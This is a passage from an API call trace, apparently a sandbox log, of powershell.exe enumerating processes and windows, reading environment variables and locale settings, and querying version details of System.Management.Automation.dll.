CoTaskMemAlloc (cb=0x804) returned 0x1b2657e0 [0080.359] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ffd0000, lpFilename=0x1b2657e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0080.359] CoTaskMemFree (pv=0x1b2657e0) [0080.360] CloseHandle (hObject=0x2f0) returned 1 [0080.372] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb08) returned 0x2f0 [0080.373] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0xedcd8 | out: lpExitCode=0xedcd8*=0x103) returned 1 [0080.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12a8b088, Length=0x20000, ResultLength=0xedca0 | out: SystemInformation=0x12a8b088, ResultLength=0xedca0*=0xe1e0) returned 0x0 [0080.396] EnumWindows (lpEnumFunc=0x29466ac, lParam=0x0) returned 1 [0080.397] GetWindowThreadProcessId (in: hWnd=0x300b4, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.397] GetWindowThreadProcessId (in: hWnd=0x300b8, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.397] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x334 [0080.398] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x324 [0080.398] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.398] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.399] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.399] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.399] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.399] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.399] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.399] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0xb0c [0080.400] GetWindow (hWnd=0x1020e, uCmd=0x4) returned 0x0 [0080.401] IsWindowVisible (hWnd=0x1020e) returned 0 [0080.401] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.401] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.401] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.401] GetWindowThreadProcessId (in: hWnd=0xa0150, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0xa14 [0080.401] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.401] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.401] GetWindowThreadProcessId (in: hWnd=0x201b4, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x9b0 [0080.401] GetWindowThreadProcessId (in: hWnd=0x201c2, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.401] GetWindowThreadProcessId (in: hWnd=0x60024, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.402] GetWindowThreadProcessId (in: hWnd=0x900a4, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x834 [0080.402] GetWindowThreadProcessId (in: hWnd=0x300e8, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x300c0, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x300e6, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x300fa, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x400b6, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.402] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x824 [0080.403] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x814 [0080.403] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x804 [0080.403] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x134 [0080.403] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x52c [0080.403] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x130 [0080.403] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x5a8 [0080.403] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x41c [0080.403] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x74c [0080.403] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x34c [0080.403] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x3c4 [0080.404] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x568 [0080.404] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7d0 [0080.404] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x708 [0080.404] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x2a8 [0080.404] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x184 [0080.404] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x308 [0080.404] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7f0 [0080.404] GetWindowThreadProcessId (in: hWnd=0x30160, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x678 [0080.404] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x5ec [0080.404] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x334 [0080.405] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x664 [0080.405] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x334 [0080.405] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x664 [0080.405] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x334 [0080.405] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x5ec [0080.405] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x5ec [0080.405] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x550 [0080.405] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7a0 [0080.405] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x594 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x564 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.406] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x548 [0080.406] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x518 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.406] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x508 [0080.406] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.407] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4ec [0080.407] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.407] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.407] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.407] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x44c [0080.407] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7ec [0080.407] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.407] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x324 [0080.407] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.407] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4a0 [0080.407] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0xb28 [0080.408] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.408] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x8ec [0080.408] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0xa14 [0080.408] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x834 [0080.408] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x824 [0080.408] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x814 [0080.408] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x804 [0080.408] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x134 [0080.408] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x52c [0080.408] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x130 [0080.409] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x5a8 [0080.409] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x41c [0080.409] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x74c [0080.409] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x34c [0080.409] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x3c4 [0080.409] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x568 [0080.409] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7d0 [0080.409] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x708 [0080.409] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x2a8 [0080.409] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x184 [0080.410] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x308 [0080.410] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7f0 [0080.410] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x678 [0080.410] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x664 [0080.410] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x334 [0080.410] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x5ec [0080.410] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x550 [0080.410] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7a0 [0080.410] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x594 [0080.410] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.411] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x508 [0080.411] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x4ec [0080.411] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x45c [0080.411] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xeda00 | out: lpdwProcessId=0xeda00) returned 0x7ec [0080.444] WerSetFlags () returned 0x0 [0080.480] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0080.480] CoTaskMemFree (pv=0x0) [0080.481] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedd60 | out: pulNumLanguages=0xedd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedd60) returned 1 [0080.481] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedd68, pwszLanguagesBuffer=0x2aab5a0, pcchLanguagesBuffer=0xedd60 | out: pulNumLanguages=0xedd68, pwszLanguagesBuffer=0x2aab5a0, pcchLanguagesBuffer=0xedd60) returned 1 [0080.524] CoTaskMemAlloc (cb=0x24) returned 0x1b263bd0 [0080.524] GetUserDefaultLocaleName (in: lpLocaleName=0x1b263bd0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0080.525] CoTaskMemFree (pv=0x1b263bd0) [0080.562] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0080.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.562] CoTaskMemFree (pv=0x1f7410) [0080.577] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0080.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.577] CoTaskMemFree (pv=0x1f7410) [0080.580] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0080.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.580] CoTaskMemFree (pv=0x1f7410) [0080.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.692] SetErrorMode (uMode=0x1) returned 0x1 [0080.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xed9e0 | out: lpFileInformation=0xed9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0080.693] SetErrorMode (uMode=0x1) returned 0x1 [0080.693] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedc50 | out: lpdwHandle=0xedc50) returned 0x94c [0080.696] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2aaee30 | out: lpData=0x2aaee30) returned 1 [0080.698] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedbc8, puLen=0xedbc0 | out: lplpBuffer=0xedbc8*=0x2aaeecc, puLen=0xedbc0) returned 1 [0080.698] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaefa8, puLen=0xedb30) returned 1 [0080.699] lstrlenW (lpString="Microsoft Corporation") returned 21 [0080.699] CoTaskMemAlloc (cb=0x2e) returned 0x24ec60 [0080.699] lstrcpyW (in: lpString1=0x24ec60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0080.699] CoTaskMemFree (pv=0x24ec60) [0080.699] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaeffc, puLen=0xedb30) returned 1 [0080.699] lstrlenW (lpString="System.Management.Automation") returned 28 [0080.699] CoTaskMemAlloc (cb=0x3c) returned 0x1cdbb0 [0080.699] lstrcpyW (in: lpString1=0x1cdbb0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0080.700] CoTaskMemFree (pv=0x1cdbb0) [0080.700] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaf058, puLen=0xedb30) returned 1 [0080.700] lstrlenW (lpString="6.1.7601.17514") returned 14 [0080.700] CoTaskMemAlloc (cb=0x20) returned 0x1b263c30 [0080.700] lstrcpyW (in: lpString1=0x1b263c30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0080.700] CoTaskMemFree (pv=0x1b263c30) [0080.700] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaf098, puLen=0xedb30) returned 1 [0080.700] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0080.700] CoTaskMemAlloc (cb=0x44) returned 0x1cdbb0 [0080.700] lstrcpyW (in: lpString1=0x1cdbb0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0080.701] CoTaskMemFree (pv=0x1cdbb0) [0080.701] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaf100, puLen=0xedb30) returned 1 [0080.701] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0080.701] CoTaskMemAlloc (cb=0x76) returned 0x1c8110 [0080.701] lstrcpyW (in: lpString1=0x1c8110, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0080.702] CoTaskMemFree (pv=0x1c8110) [0080.702] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaf19c, puLen=0xedb30) returned 1 [0080.702] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0080.702] CoTaskMemAlloc (cb=0x44) returned 0x1cdbb0 [0080.702] lstrcpyW (in: lpString1=0x1cdbb0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0080.702] CoTaskMemFree (pv=0x1cdbb0) [0080.702] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaf200, puLen=0xedb30) returned 1 [0080.702] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0080.702] CoTaskMemAlloc (cb=0x58) returned 0x194af0 [0080.702] lstrcpyW (in: lpString1=0x194af0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0080.703] CoTaskMemFree (pv=0x194af0) [0080.703] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaf27c, puLen=0xedb30) returned 1 [0080.703] lstrlenW (lpString="6.1.7601.17514") returned 14 [0080.703] CoTaskMemAlloc (cb=0x20) returned 0x1b263c30 [0080.703] lstrcpyW (in: lpString1=0x1b263c30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0080.703] CoTaskMemFree (pv=0x1b263c30) [0080.703] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x2aaef24, puLen=0xedb30) returned 1 [0080.703] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0080.703] CoTaskMemAlloc (cb=0x66) returned 0x1c6df0 [0080.704] lstrcpyW (in: lpString1=0x1c6df0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0080.704] CoTaskMemFree (pv=0x1c6df0) [0080.704] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x0, puLen=0xedb30) returned 0 [0080.704] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x0, puLen=0xedb30) returned 0 [0080.704] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedb38, puLen=0xedb30 | out: lplpBuffer=0xedb38*=0x0, puLen=0xedb30) returned 0 [0080.704] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedb08, puLen=0xedb00 | out: 